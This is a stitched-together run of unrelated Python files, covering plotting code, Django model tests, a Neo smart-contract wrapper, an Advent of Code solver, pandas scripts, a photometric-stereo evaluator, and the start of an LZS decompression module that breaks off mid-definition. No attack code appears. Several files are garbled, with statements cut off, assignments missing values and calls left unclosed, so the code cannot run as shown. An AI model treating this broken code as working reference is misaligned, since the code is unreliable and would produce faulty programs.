tmp_Y.append(X_transf[idx,1]) # print tmp_X # print tmp_Y # plt.scatter(tmp_X, tmp_Y, X_transf[idx,1], c=color_map[cat], label=cat) idxs = [i for i, x in enumerate(C) if x == cat] ax.plot(X_transf[idxs[0],0], \ X_transf[idxs[0],1], \ 'o', c=color_map[cat], label=cat) for idx in idxs[1:]: ax.plot(X_transf[idx,0], \ X_transf[idx,1], \ 'o', c=color_map[cat]) #plt.legend(frameon=False, fontsize=10,labelspacing=0.25,numpoints=1) #plt.savefig(options.output_file,bbox_inches='tight') #l1=ax.legend(loc='lower right', \ l1=ax.legend(loc='upper right', \ labelspacing=0.25,\ frameon=False, \ fontsize=12, \ ncol=1) yticks, yticklabels = matplotlib.pyplot.yticks() ymin = (3*yticks[0] - yticks[1])/2. ymax = (3*yticks[-1] - yticks[-2])/2. matplotlib.pyplot.ylim(ymin, ymax) matplotlib.pyplot.yticks(yticks) xticks, xticklabels = matplotlib.pyplot.xticks() xmin = (3*xticks[0] - xticks[1])/2. xmax = (3*xticks[-1] - xticks[-2])/2. matplotlib.pyplot.xlim(xmin, xmax) matplotlib.pyplot.xticks(xticks) #for text in l1.get_texts(): #matplotlib.pyplot.setp(text,color='white') #################################################### matplotlib.pyplot.savefig(options.output_file,\ bbox_inches='tight', transparent=True)
"""Tests for the aerial_position module.""" from auvsi_suas.models.aerial_position import AerialPosition from auvsi_suas.models.gps_position import GpsPosition from django.test import TestCase class TestAerialPositionModel(TestCase): """Tests the AerialPosition model.""" def assertDistanceEqual(self, pos1, pos2, dist, threshold=10): """AerialPosition distances are within threshold (ft).""" self.assertAlmostEqual(pos1.distance_to(pos2), dist, delta=threshold) self.assertAlmostEqual(pos2.distance_to(pos1), dist, delta=threshold) def evaluate_distance_inputs(self, io_list): """Evaluates the distance_to calc with the given input list.""" for (lon1, lat1, alt1, lon2, lat2, alt2, dist_actual) in io_list: gps1 = GpsPosition(latitude=lat1, longitude=lon1) gps2 = GpsPosition(latitude=lat2, longitude=lon2) pos1 = AerialPosition(gps_position=gps1, altitude_msl=alt1) pos2 = AerialPosition(gps_position=gps2, altitude_msl=alt2) self.assertDistanceEqual(pos1, pos2, dist_actual) def test_distance_zero(self): """Tests distance calc for same position.""" self.evaluate_distance_inputs([ # (lon1, lat1, alt1, lon2, lat2, alt2, dist_actual) (0, 0, 0, 0, 0, 0, 0), (1, 2, 3, 1, 2, 3, 0), (-30, 30, 100, -30, 30, 100, 0), ]) # yapf: disable def test_distance_competition_amounts(self): """Tests distance calc for competition amounts.""" self.evaluate_distance_inputs([ # (lon1, lat1, alt1, lon2, lat2, alt2, dist_actual) (-76.428709, 38.145306, 0, -76.426375, 38.146146, 0, 736.4), (-76.428537, 38.145399, 0, -76.427818, 38.144686, 100, 344.4), (-76.434261, 38.142471, 100, -76.418876, 38.147838, 800, 4873.7), ]) # yapf: disable def test_duplicate_unequal(self): """Tests the duplicate function with unequal positions.""" gps1 = GpsPosition(latitude=0, longitude=0) gps2 = GpsPosition(latitude=1, longitude=1) pos1 = AerialPosition(gps_position=gps1, altitude_msl=0) pos2 = AerialPosition(gps_position=gps2, altitude_msl=0) pos3 = AerialPosition(gps_position=gps1, altitude_msl=1) self.assertFalse(pos1.duplicate(pos2)) self.assertFalse(pos1.duplicate(pos3)) def test_duplicate_equal(self): """Tests the duplicate function with unequal positions.""" gps1 = GpsPosition(latitude=0, longitude=0) gps2 = GpsPosition(latitude=0, longitude=0) pos1 = AerialPosition(gps_position=gps1, altitude_msl=0) pos2 = AerialPosition(gps_position=gps2, altitude_msl=0) pos3 = AerialPosition(gps_position=gps1, altitude_msl=0) self.assertTrue(pos1.duplicate(pos2)) self.assertTrue(pos1.duplicate(pos3))
<reponame>CityOfZion/neo3-boa<gh_stars>10-100 from typing import Any from boa3.builtin import contract, public from boa3.builtin.type import UInt160 @contract('0xf3349090a6abd4771739da994dd155a4294e6837') class Nep17: @staticmethod def symbol() -> str: pass @staticmethod def decimals() -> int: pass @staticmethod def totalSupply() -> int: pass @staticmethod def balanceOf(account: UInt160) -> int: pass @staticmethod def transfer(from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool: pass @public def nep17_symbol() -> str: return Nep17.symbol() @public def nep17_decimals() -> int: return Nep17.decimals() @public def nep17_total_supply() -> int: return Nep17.totalSupply() @public def nep17_balance_of(account: UInt160) -> int: return Nep17.balanceOf(account) @public def nep17_transfer(from_account: UInt160, to_account: UInt160, amount: int, additional_data: Any) -> bool: return Nep17.transfer(from_account, to_account, amount, additional_data)
import copy def parse_lines(input_text): action = input_text.split(" ")[0] amount = int(input_text.split(" ")[1]) return [action, amount, 0] def run_game(input_file): acc = 0 index = 0 curr = input_file[index] curr[2] += 1 while curr[2] <= 1 and index < len(input_file): action = curr[0] num = curr[1] if action == "nop": index += 1 elif action == "acc": acc += num index += 1 elif action == "jmp": index += num else: raise Exception("Invalid command") if index >= len(input_file): break curr = input_file[index] curr[2] += 1 status = "success" if index >= len(input_file) else "failed" for idx, val in enumerate(input_file): val[2] = 0 input_file[idx] = val return acc, status def flip_command(input_file): for idx, val in enumerate(input_file): if val[0] not in ["jmp", "nop"]: continue revised = copy.deepcopy(input_file) if val[0] == "jmp": revised[idx][0] = "nop" elif val[0] == "nop": revised[idx][0] = "jmp" check = run_game(revised) if check[1] == "success": return check[0] return -999 filename = "input_day8.txt" with open(filename, "r") as input: input_file = input_file = [parse_lines(i) for i in input_file] check_acc = run_game(input_file)[0] print(f"Acc:\t{check_acc}") flip_acc = flip_command(input_file) print(f"Flipped acc:\t{flip_acc}")
<reponame>devTaemin/Anchorvalue-fintech-hackathon import pandas as pd from pandas import DataFrame df_0 = pd.read_csv('2019.csv', delimiter=',', encoding='utf-8-sig') df_1 = pd.read_csv('2020.csv', delimiter=',', encoding='utf-8-sig') #df_2 = pd.read_csv('2020_news_summary.csv', delimiter=',') df_merge = pd.concat([df_0, df_1]) # row bind : axis = 0, default data = {"Date": [], "Title": [], "Summary": [], "Url": [], "Label": []} new_df = DataFrame(data) new_df["Date"] = df_merge["Date"] new_df["Title"] = df_merge["Title"] new_df["Summary"] = df_merge["Summary"] new_df["Url"] = df_merge["Url"] new_df["Label"] = df_merge["Label"] result = new_df.dropna(axis=0) print(len(result)) new_df.to_csv('news_label.csv', sep=',', encoding='utf-8-sig')
<gh_stars>0 ''' Assembles plot pages based on the grimsel.plotting.plotting module ''' import sys from importlib import reload import logging import subprocess import pandas as pd import numpy as np import matplotlib.pyplot as plt from matplotlib.backends.backend_pdf import PdfPages import pyAndy.core.plotting as lpplt from pyAndy.auxiliary import aux_sql_func as aql from pyAndy.core.plotpagedata import PlotPageData as PlotPageData reload(lpplt) reload(aql) class PlotPage: """ Sets up the page and the axes layout, making use of gridspec and subplots. """ # default parameters for page layout dim_a4_wide = (11.69, 8.27) dim_a4_high = (8.27, 11.69) pg_layout = {'page_dim': dim_a4_high, 'bottom': 0.25, 'top': 0.95, 'left': 0.2, 'right': 0.8, 'wspace': 0.2, 'hspace': 0.2, 'width_ratios': None, 'height_ratios': None, 'axarr': None, 'dpi': 150} # scaling depending on screen resolution page_scale = 2#get_config('page_scale')[sys.platform] def __init__(self, nx, ny, sharex, sharey, **kwargs): self.pg_layout = PlotPage.pg_layout.copy() for key, val in self.pg_layout.items(): if key in kwargs.keys(): self.pg_layout.update({key: kwargs.pop(key)}) page_dim = self.pg_layout.pop('page_dim') self.dpi = self.pg_layout.pop('dpi') print('dpi', self.dpi) axarr = self.pg_layout.pop('axarr') if not isinstance(axarr, np.ndarray): self.fig, self.axarr = plt.subplots(nrows=ny, ncols=nx, sharex=sharex, sharey=sharey, squeeze=False, gridspec_kw=self.pg_layout, dpi=self.dpi ) self.axarr = self.axarr.T else: self.fig, self.axarr = (axarr[0][0].get_figure(), axarr) if not page_dim is None: self.fig.set_size_inches([PlotPage.page_scale * idim for idim in page_dim]) class PlotTiled(PlotPage): ''' Set up a tiled plot page. ''' def __init__(self, pltpgdata, **kwargs): self.pltpgdata = pltpgdata self.nx, self.ny = self.pltpgdata.get_plot_nxy() defaults = { 'kind_def': 'LinePlot', 'kind_dict': {}, 'plotkwargsdict': {}, 'sharex': False, 'sharey': False, 'val_axy': False, 'caption': True, 'drop_nan_cols': True, 'draw_now': True, 'legend': 'page', } for key, val in defaults.items(): setattr(self, key, val) if key in kwargs.keys(): setattr(self, key, kwargs[key]) kwargs.pop(key) self.plotdict = {} self.posdict = {} # dict containing plot locations in the grid if self.draw_now: # Produce an actual figure kws = dict(nx=self.nx, ny=self.ny, sharex=self.sharex, sharey=self.sharey, **{kk: vv for kk, vv in kwargs.items() if kk in PlotPage.pg_layout.keys()}) super(PlotTiled, self).__init__(**kws) else: # Generate a dummy axarr, which is the only necessary parameter self.axarr = np.tile(np.nan, (self.nx, self.ny)) # remove PlotPage kwargs from kwargs kwargs = {kk: vv for kk, vv in kwargs.items() if not kk in PlotPage.pg_layout.keys()} # left-over kwargs are for plots self.plotkwargs = kwargs self._init_default_xylabel() # get full dictionary plot type --> columns self._expand_kind_dict() self._expand_plotkwargsdict() self.ax_loop() if self.draw_now: self.draw_plots() self.finalize_plottiled() @staticmethod def save_plot(fig, name): with PdfPages(name + '.pdf') as pp: pp.savefig(fig) fig.savefig(name + '.svg') fig.savefig(name + '.png') try: cmd = 'inkscape --file {f}.svg --export-emf {f}.emf'.format(f=name) cmd = cmd.split(' ') except: pass @classmethod def concat(cls, concat_list, concat_dir='y', sharex=False, sharey=False, draw_now=True, alt_align=False, **kwargs): if not concat_dir in ['x', 'y']: raise ValueError('Parameter concat_dir must be one of ("x", "y")') self = cls.__new__(cls) # are we concatenating along x? concat_x = (concat_dir == 'x') # get new subplots shape _dim_sum = 0 if concat_dir == 'x' else 1 _dim_max = 1 if concat_dir == 'x' else 0 len_sum = sum([obj.axarr.shape[_dim_sum] for obj in concat_list]) len_max = max([obj.axarr.shape[_dim_max] for obj in concat_list]) self.nx, self.ny = ((len_sum, len_max) if concat_x else (len_max, len_sum)) # generate instance new PlotPage if draw_now: kws = dict(nx=self.nx, ny=self.ny, sharex=sharex, sharey=sharey, **{kk: vv for kk, vv in kwargs.items() if kk in PlotPage.pg_layout.keys()}) super(PlotTiled, self).__init__(**kws) else: # Generate a dummy axarr, which is the only necessary parameter self.axarr = np.tile(np.nan, (self.nx, self.ny)) # generate new plotdict dict self.plotdict = {} self.posdict = {} # keep track of axes which are being used list_ax_not_empty = [] cnt_xy = 0 # counter along concatenation dimension for npo, po_slct in enumerate(concat_list): print(npo) for nx, pltx, ny, plty, plot, ax, kind in po_slct.get_plot_ax_list(): '''''' if concat_x: align_offset = self.ny - po_slct.ny if alt_align else 0 else: align_offset = self.nx - po_slct.nx if alt_align else 0 gridpos_x = nx + (cnt_xy if concat_x else 0) \ + (align_offset if not concat_x else 0) gridpos_y = ny + (cnt_xy if not concat_x else 0) \ + (align_offset if concat_x else 0) print(nx, pltx, ny, plty, gridpos_x, gridpos_y) # raise error if plot indices are already in plotdict keys; # note that this is not strictly necessary but avoids trouble # later on (double keys in plotdict): if (pltx, plty) in self.plotdict.keys(): e = ('Trying to add a second plot {}. Make sure plot ' + 'indices are unique before concatenating TiledPlot ' + 'objects. Consider using the _name attribute as ' + 'an index.').format(str((pltx, plty))) raise IndexError(e) # add plot to new plotdict self.plotdict[pltx, plty, kind] = plot # assign new axes to the original plot objects = self.axarr[gridpos_x][gridpos_y] list_ax_not_empty.append( # define new position for the original plot objects self.posdict[pltx, plty] = (gridpos_x, gridpos_y) cnt_xy += nx + 1 if concat_x else ny + 1 # generate list_ind_pltx/y lists if draw_now: # delete empty axes for ax_del in [ax for ax in self.axarr.flatten() if not ax in list_ax_not_empty]: self.fig.delaxes(ax_del) for plt_slct in concat_list: for plot in plt_slct.plotdict.values(): plot.gen_plot() plot.finalize_axis() return self def finalize_plottiled(self): if self.caption: self.add_caption() def _init_default_xylabel(self): ''' Modify the plot kwargs x/ylabel param if no value is provided. ''' for xy in 'xy': lab = '%slabel'%xy no_inp = (not lab in self.plotkwargs or (lab in self.plotkwargs and self.plotkwargs[lab] in [False, None])) if no_inp: # Setting the x/y data name by default, if available, else the # value name. axxy = getattr(self.pltpgdata, 'ind_ax%s'%xy) if axxy is not None: self.plotkwargs.update({lab: axxy}) elif xy != 'x': self.plotkwargs.update({lab: self.pltpgdata.values}) def _expand_legend_dict(self): if not isinstance(self.legend, dict): _legend = dict() if self.legend == 'plots': # plot-level legends on all plots _legend['plots'] = list(self.plotdict.values()) elif isinstance(self.legend, tuple): # legend is assumed to specify a plot for legend addition _legend['plot'] = list({self.plotdict[self.legend]}) elif self.legend == 'page': # page-level legend on last plot _legend['page'] = [self.current_plot] else: # translate plot indices to plot objects _legend = {key: [self.plotdict[plot_ind] for plot_ind in vals] for key, vals in self.legend.items()} return _legend def get_legend_handles_labels(self, unique=True): ''' Collects legend handles and labels from plot objects and removes duplicates if unique is True ''' hdls_lbls = [] for plot in self.plotdict.values(): plot_hdl, plot_lbl = plot.get_legend_handles_labels() hdls_lbls += list(zip(plot_hdl, plot_lbl)) hdls_lbls = list(zip(*hdls_lbls)) if unique: # dictionary and back hdls_lbls = list(reversed(list(zip(*list(dict( zip(*reversed(hdls_lbls))).items()))))) return hdls_lbls def add_legends(self, **plot_legend_kwargs): print('plot_legend_kwargs : ', plot_legend_kwargs) _legend = self._expand_legend_dict() if 'plots' in _legend: for plot in _legend['plots']: plot.add_plot_legend(**plot_legend_kwargs, from_ax=True) if 'page' in _legend or 'plot' in _legend: hdls, lbls = self.get_legend_handles_labels(unique=True) if 'page' in _legend: self.add_page_legend(slct_plot=_legend['page'][0], handles=hdls, labels=lbls, **plot_legend_kwargs) if 'plot' in _legend: _legend['plot'][0].add_plot_legend(handles=hdls, labels=lbls, **plot_legend_kwargs) logging.debug(_legend) def add_page_legend(self, slct_plot=None, handles=None, labels=None, **plot_legend_kwargs): ''' Add legend in the corner of the figure. This adds a plot legend with some bbox kwargs to move it to the figure corner. ''' legkw = {'bbox_transform': self.fig.transFigure, 'bbox_to_anchor': (1, 1)} print('add_page_legend', plot_legend_kwargs) plot_legend_kwargs.update(legkw) plot_legend_kwargs.update(handles=handles, labels=labels) logging.debug(plot_legend_kwargs) slct_plot.add_plot_legend(**plot_legend_kwargs) def _expand_kind_dict(self): ''' Expands the dictionary data series -> plot type. This dictionary is used to slice the data by plot type. Note: input arg kind_dict is of shape {'series_element': 'kind0', ...} ''' cols = # flatten column names cols_all_items = set([cc for c in cols for cc in c]) # default map: columns -> default type kind_dict_cols = {kk: self.kind_def for kk in cols} # update using the kind_dict entries corresponding to single elements dct_update = {kk: vv for kk, vv in self.kind_dict.items() if kk in cols_all_items or kk in cols} dct_update = {cc: [vv for kk, vv in dct_update.items() if kk in cc or kk == cc][0] for cc in cols if any([c in cc or c == cc for c in dct_update.keys()])} kind_dict_cols.update(dct_update) # update using the kind_dict entries corresponding to specific columns dct_update = {kk: vv for kk, vv in self.kind_dict.items() if kk in cols} dct_update = {cc: [vv for kk, vv in dct_update.items() if kk in cc][0] for cc in cols if any([c in cc for c in dct_update.keys()])} kind_dict_cols.update(dct_update) # invert to plot type -> data series kind_dict_rev = {k: [v for v in kind_dict_cols.keys() if kind_dict_cols[v] == k] for k in list(set(kind_dict_cols.values()))} self._kind_dict_cols = kind_dict_rev @staticmethod def _select_dict_dict(dct, key): ''' From a dictionary of dictionaries select 'all' and update with key. Select the 'all' key of the input dictionary---if it exists---and update the value dictionary. If 'all' doesn't exist, return the 'key' value dictionary, if that exists. Otherwise return an empty dictionary. Args: dct (dict): Dictionary holding the dictionaries to be accessed key (immutable): Dictionary key for secondary access Returns: dictionary: selected dictionary ''' # get relevant part of plotkwargsdict if 'all' in dct: _dct_slct = dct['all'].copy() # update with more specific entry, if present if key in dct: _dct_slct.update(dct[key]) elif key in dct: _dct_slct = dct[key].copy() else: _dct_slct = {} return _dct_slct def _expand_plotkwargsdict(self): # generate expanded default dictionary _plotkwargsdict = dict() _, ipx, _, ipy = self.pltpgdata._iter_ind[0] for _, ipx, _, ipy in self.pltpgdata._iter_ind: kind = list(self._kind_dict_cols.keys())[0] for kind in self._kind_dict_cols: plotkey = ipx, ipy, kind dct = self.plotkwargsdict.copy() key = plotkey _plotkwd_slct = self._select_dict_dict(dct, plotkey) _plotkwargsdict[plotkey] = dict() # kind = self._kind_dict_cols[kind][0] for ser in self._kind_dict_cols[kind]: # default _plotkwargsdict[plotkey][ser] = self.plotkwargs.copy() _srskwd_slct = self._select_dict_dict(_plotkwd_slct, ser) _plotkwargsdict[plotkey][ser].update(_srskwd_slct) # make sure all entries are copies for key, val in _plotkwargsdict[plotkey][ser].items(): if hasattr(val, 'copy'): _plotkwargsdict[plotkey][ser][key] = val.copy() # as long as it's not a pandas plot we don't need the # whole colormap for each series # cmap = _plotkwargsdict[plotkey][ser]['colormap'] # if not '.' in kind and isinstance(cmap, dict): # # ser_color = cmap[ser[-1]] # cmap.clear() # cmap[ser[-1]] = ser_color self._plotkwargsdict = _plotkwargsdict def draw_plots(self): for nameplot, plot in self.plotdict.items(): plot.draw_plot() # loop over plots # update ax! # call plot method gen_plot_series # do legend stuff def gen_plot(self, data_slct, ipltxy, kind, _plotkwargs): ''' Generate plots of the selected kind. ''' ax = self.axarr[ipltxy[0]][ipltxy[1]] # main call to lpplt self.data_slct = data_slct # only generate plot objects, don't draw them no_draw = {'draw_now': False} if kind in ['BoxPlot']: # requires special input kwargs kwargs = dict(data=data_slct, ax=ax, x=self.pltpgdata.ind_axx[0], **no_draw) self.current_plot = lpplt.BoxPlot(**kwargs) # check whether plotting contains a dedicated class for this # plot kind; if yes, create an instance. ... elif hasattr(lpplt, kind): kwargs = dict(data=data_slct, ax=ax, plotkwargs=_plotkwargs, **no_draw) self.current_plot = getattr(lpplt, kind)(**kwargs) # ... if no, it's a pandas plot, for now else: # all pandas series are drawn simultaneously... select only the # first _plotkwargsdict pkws_arg = {'all': list(_plotkwargs.items())[0][1]} kwargs = dict(data=data_slct, ax=ax, pd_method=kind, plotkwargs=pkws_arg, **no_draw) self.current_plot = lpplt.PlotPandas(**kwargs) def ax_loop(self): ''' Loops over - axis columns - axis rows - plot types as defined in self._kind_dict_cols Selects data for the corresponding subplot/type and calls gen_plot. ''' for ipltx, slct_ipltx, iplty, slct_iplty, data_slct_0 in self.pltpgdata.get_data(): pass data_slct_0 = pd.DataFrame(data_slct_0) index_slct = self.pltpgdata._merge_plt_indices(slct_ipltx, slct_iplty) kind, kind_cols = list(self._kind_dict_cols.items())[0] for kind, kind_cols in self._kind_dict_cols.items(): _plotkwargs = self._plotkwargsdict[slct_ipltx, slct_iplty, kind] title_dict = {'title': '{}\n{}'.format(str(slct_ipltx), str(slct_iplty))} for key in _plotkwargs: print(key) # 1. title if (not 'title' in _plotkwargs[key].keys()) \ or ('title' in _plotkwargs[key].keys() and _plotkwargs[key]['title'] in [False, None]): _plotkwargs[key].update(title_dict) # 2. plotkwargs know where they are located _plotkwargs[key]['gridpos'] = (ipltx, iplty) col_subset = [c for c in data_slct_0.columns if c in kind_cols] if not col_subset: continue print('Plotting ', kind, index_slct, self.pltpgdata.ind_pltx, self.pltpgdata.ind_plty) data_slct = data_slct_0[col_subset] _indx_drop = [ii for ii in data_slct.index.names if not ii in self.pltpgdata._ind_ax_all] if _indx_drop: data_slct.reset_index(_indx_drop, drop=True, inplace=True) ipltxy = [ipltx, iplty] self.gen_plot(data_slct, ipltxy, kind, _plotkwargs) self.plotdict[slct_ipltx, slct_iplty, kind] = self.current_plot self.posdict[slct_ipltx, slct_iplty] = (ipltx, iplty) def _gen_caption_string(self): ''' Generate caption string to be added to the bottom of the plot page. ''' self.caption_str = ('n_min={}, n_max={}, data_threshold={}\n' + 'table: {}\nfilt={}')\ .format(*self.pltpgdata.nsample, self.pltpgdata.data_threshold, '.'.join([str(, str(self.pltpgdata.table)]), self.pltpgdata.filt) def add_caption(self): ''' Add basic information to the bottom of the page. ''' if not 'caption_str' in self.__dict__.keys(): self._gen_caption_string() plt.figtext(0.05, 0.05, self.caption_str.replace('_', ' '), va='top', wrap=True) def get_plot_ax_list(self): ''' Return all relevant plot indices and objects. This is useful to make specific changes to the plot after the object instantiation. The return list is constructed from the posdict and plotdict attributes. Note: The keys of the plotdict are (name_x, name_y, plot_kind), the keys of the posdict are (name_x, name_y). Returns: list of tuples: (index_x, name_x, index_y, name_y, plot_object, axes, plotkind) for each plot/plot_type ''' return [(self.posdict[nxyk[:2]][0], nxyk[0], self.posdict[nxyk[:2]][1], nxyk[1], p,, nxyk[2]) for nxyk, p in self.plotdict.items()] @staticmethod def add_shared_label(text, ax1, ax2, axis='x', label_offset=0.1, twinax=False, rotation=None): ''' Adds an x or y-label between two axes. ''' label_pos1 = (0 if axis == 'y' and not twinax else 1, 1 if axis == 'x' and twinax else 0) label_pos2 = (1 if axis == 'y' and twinax else 0, 0 if axis == 'x' and not twinax else 1) if not twinax: label_offset *= -1 label_pos = (0.5 * (ax1.transAxes.transform(label_pos1) + ax2.transAxes.transform(label_pos2))) label_pos = ax1.transAxes.inverted().transform(label_pos) label_pos[1 if not axis=='y' else 0] += label_offset if axis == 'x': ax1.set_xlabel(text) ax1.xaxis.set_label_coords(*label_pos) if rotation: ax1.yaxis.label.set_rotation(rotation) elif axis == 'y': ax1.set_ylabel(text) ax1.yaxis.set_label_coords(*label_pos) if rotation: ax1.yaxis.label.set_rotation(rotation) # %% if __name__ == '__main__': import grimsel.auxiliary.maps as maps from pyAndy import PlotPageData logging.basicConfig(stream=sys.stdout, level=logging.NOTSET) logger = logging.getLogger() logger.setLevel(0) sc_out = 'out_levels' slct_nd = 'DE0' db = 'storage2' mps = maps.Maps(sc_out, db) ind_pltx = ['sta_mod'] ind_plty = ['pwrerg_cat'] ind_axx = ['sy'] ind_axy = [] values = ['value_posneg'] series = ['bool_out', 'fl'] table = sc_out + '.analysis_time_series' stats_data = {'DE0': '%agora%', 'FR0': '%eco2%', 'CH0': '%entsoe%'} filt = [ ('nd', [slct_nd]), ('swfy_vl', ['yr2015', 'nan'], ' LIKE '), # ('fl', ['%nuclear%'], ' LIKE '), # ('swchp_vl', ['chp_off']), # ('swcadj_vl', ['adjs']), ('run_id', [0, -1]), ('wk_id', [5]), ('sta_mod', ['%model%', stats_data[slct_nd]], ' LIKE '), # ('sta_mod', ['%model%'], ' LIKE '), ('pwrerg_cat', ['%pwr%'], ' LIKE '), ('fl', ['dmnd', '%coal%', '%nuc%', '%lig%', '%gas', 'load_prediction_d', 'wind_%', '%photo%', '%bio%', 'lost%', 'dmnd_flex'], ' LIKE '), # ('fl', ['dmnd', 'load_prediction_d'], ' LIKE ') ] post_filt = [] # from ind_rel lst_series = aql.read_sql(db, sc_out, 'def_pp_type')['pt'].tolist() dict_series_order = {'BAL': -100, 'WAS': -50, 'NUC': -75, 'LIG': 10, 'natural_gas': 40, 'reservoir': 2000, 'export': -200, 'import': 1000, 'run_of_river': -10, 'wind_onshore': 4000, 'wind_offshore': 4000, 'photovoltaics': 4001, } df_series_order = aql.read_sql(db, sc_out, 'def_plant', keep=['pp', 'pt_id', 'nd_id', 'fl_id']) df_series_order = df_series_order.join(aql.read_sql(db, sc_out, 'def_pp_type').set_index('pt_id')['pt'], on='pt_id') df_series_order = df_series_order.join(aql.read_sql(db, sc_out, 'def_fuel').set_index('fl_id')['fl'], on='fl_id') df_series_order = df_series_order.join(aql.read_sql(db, sc_out, 'def_node').set_index('nd_id')['nd'], on='nd_id') df_series_order['pp_red'] = df_series_order.pp.apply(lambda x: x.split('_')[1]) df_series_order = df_series_order.loc[df_series_order.nd.isin([f for f in filt if 'nd' == f[0]][0][1])] df_series_order['rank'] = np.inf for icol in ['pp_red', 'pp_red', 'pt']: df_order_dict = pd.DataFrame.from_dict(dict_series_order, columns=['rank_new'], orient='index') df_order_dict.index.names = [icol] df_series_order = df_series_order.join(df_order_dict, on=df_order_dict.index.names).fillna(1e10) df_series_order['rank'] = df_series_order[['rank', 'rank_new']].min(axis=1) df_series_order = df_series_order.drop('rank_new', axis=1) series_order = df_series_order.sort_values(['rank', 'pp']).fl.unique().tolist() data_kw = {'filt': filt, 'post_filt': post_filt, 'data_scale': {'dmnd': -1}, 'totals': {'others': ['waste_mix'], 'total_dmnd': ['dmnd'] }, 'data_threshold': 1e-9, 'aggfunc': np.sum, 'harmonize': False, 'series_order': series_order} do = PlotPageData(db, ind_pltx, ind_plty, ind_axx, values, series, table, **data_kw) = # % # delete data aggregated in others =[:,['others'])] =[:,[c for c in if any(comp in c for comp in do.totals['total_dmnd'])])] # %% color=mps.get_color_dict(series[-1]) color.update({'other': '#99aaaa', 'others': '#99aaaa', 'other_negative': '#ffffff', 'other_ren': '#ffffff', 'DE_DMND': 'k', 'CH_DMND': 'k', 'co2_intensity': 'g', 'hydro_total': color['reservoir'], 'dmnd_flex': 'k', 'biomass': color['bio_all'], 'biogas': color['bio_all'], 'natural_gas_cc': color['natural_gas'], 'natural_gas_chp': color['natural_gas'], 'natural_gas_others': color['natural_gas'], 'natural_gas_turbines': color['natural_gas'], 'pumped_hydro_pumping': color['pumped_hydro'], 'load_prediction_d': color['dmnd']},) color.update({sr[-1]: 'k' for sr in if not sr[-1] in color}) color['extra'] = 'k' color['total_dmnd'] = color['dmnd'] # color = False legend = (('stats_agora',), ('pwr',), 'StackedArea') # plot level series level plotkwargsdict = {'all': {('value_posneg', 'False', 'natural_gas'): dict(edgewidth=2, edgecolor='b')}, 'all': {('', '', 'total_dmnd'): dict(linewidth=3, markersize=10, marker='.')}, } # plotkwargsdict = {} layout_kw = {'left': 0.1, 'right': 0.875, 'wspace': 0.2, 'hspace': 0.2, 'bottom': 0.1, 'top': 0.8} label_kw = {'label_format': ' ,%.2f', 'label_subset':[-1], 'label_threshold':-1e-6, 'label_ha': 'right', 'loc_labels': 1} plot_kw = dict(kind_def='StackedArea', kind_dict={'total_dmnd': 'StepPlot'}, plotkwargsdict=plotkwargsdict, stacked=True, on_values=False, sharex=True, sharey=True, colormap=color, barwidth=0.1, linewidth=0, edgecolor=None, edgewidth=0, marker=None, reset_xticklabels=False, legend=legend,#(('stats_agora',), ('pwr',), 'LinePlot'), draw_now=True, ylabel='Power [MW]', step='post', #ylim=dict(bottom=0), ) from collections import OrderedDict # # new_data = np.abs('sy').values - 800) * 100 #['model', 'extra'] = new_data[:int(len(new_data) / 2)] #with'ggplot')): self = PlotTiled(do, **layout_kw, **label_kw, **plot_kw) self.add_legends(loc=1, ncol=3, string_replace_dict=OrderedDict({'(': '', '(value_posneg': '', 'False': '', 'True': '', ', ': '', '\'': '', ')': ''})) # %%
<gh_stars>1-10 import numpy as np import matplotlib.pyplot as plt from PIL import Image def evaluate(b, dir): gt = np.zeros([7, 168, 168]) for num in range(7): gt[num] = np.asarray( + '/train/' + str(num + 1) + '.bmp')) ang = np.zeros([7, 2]) lvector = np.zeros([7, 3]) # the direction of light for line in open(dir + '/train.txt'): i, ang1, ang2 = line.strip().split(",") i = int(i) ang1 = int(ang1) ang2 = int(ang2) ang[i - 1] = (ang1, ang2) lvector[i - 1] = (np.sin(np.pi * ang1 / 180) * np.cos(np.pi * ang2 / 180), np.sin(np.pi * ang2 / 180), np.cos(np.pi * ang1 / 180) * np.cos(np.pi * ang2 / 180)) lvector = -lvector img = np.clip(np.einsum('ij,jkl->ikl', lvector, b), 0, 255) err = np.mean(np.mean(gt - img, axis=-1), axis=-1) plt.figure() for num in range(7): plt.subplot(2, 7, 1 + num) plt.imshow(gt[num], cmap='gray') plt.title('Ang1={} Ang2={}\nMean Error={:.3f}'.format(ang[num][0], ang[num][1], err[num])) plt.subplot(2, 7, 8 + num) plt.imshow(img[num], cmap='gray') return img
#!/usr/bin/env python3 # # MIT License # # Copyright (c) 2020-2021 EntySec # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # import re import base64 import random import string ############################################################## # Lempel-Ziv-Stac decompression # BitReader and RingList classes # # Copyright (C) 2011 <NAME> - FiloSottile # - # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see &lt;;. # ############################################################## import collections class BitReader: def __init__(self, data_bytes): self._bits = collections.deque() for byte in data_bytes: for n in range(8): self._bits.append(bool((byte >> (7 - n)) & 1)) def getBit(self): return self._bits.popleft() def getBits(self, num): res = 0 for i in range(num): res += self.getBit() << num - 1 - i return res def getByte(self): return self.getBits(8) def __len__(self): return len(self._bits) class RingList: def __init__(self, length): self.__data__ = collections.deque() self.__full__ = False self.__max__ = length def 